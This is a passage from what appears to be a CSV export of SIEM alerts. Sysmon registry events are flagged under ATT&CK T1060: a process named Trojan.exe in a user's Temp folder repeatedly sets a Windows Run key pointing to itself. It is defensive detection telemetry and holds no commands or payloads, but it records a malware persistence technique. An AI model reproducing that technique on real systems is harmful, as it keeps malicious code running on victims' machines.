13:26:01.564"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:13.678",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:00.549 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:00.551835500Z"",""eventRecordID"":""1578"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:00.549\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:00.549"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:12.662",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:59.533 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:59.544688200Z"",""eventRecordID"":""1576"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:59.533\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:59.533"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:23:11.633",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:58.517 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:58.520323300Z"",""eventRecordID"":""1575"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:58.517\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:58.517"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:10.615",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:57.502 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:57.504275500Z"",""eventRecordID"":""1572"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:57.502\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:57.502"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:09.599",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:56.486 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:56.490701600Z"",""eventRecordID"":""1568"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:56.486\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:56.486"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:23:08.587",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:55.455 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:55.461176900Z"",""eventRecordID"":""1566"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:55.455\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:55.455"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:07.553",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:54.424 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:54.431912100Z"",""eventRecordID"":""1563"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:54.424\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:54.424"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:06.537",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:53.408 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:53.420291600Z"",""eventRecordID"":""1561"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:53.408\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:53.408"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:23:05.538",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:52.393 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:52.394518700Z"",""eventRecordID"":""1556"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:52.393\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:52.393"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:04.490",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:51.377 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:51.377895700Z"",""eventRecordID"":""1554"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:51.377\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:51.377"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:03.380",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:50.361 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:50.369824700Z"",""eventRecordID"":""1553"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:50.361\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 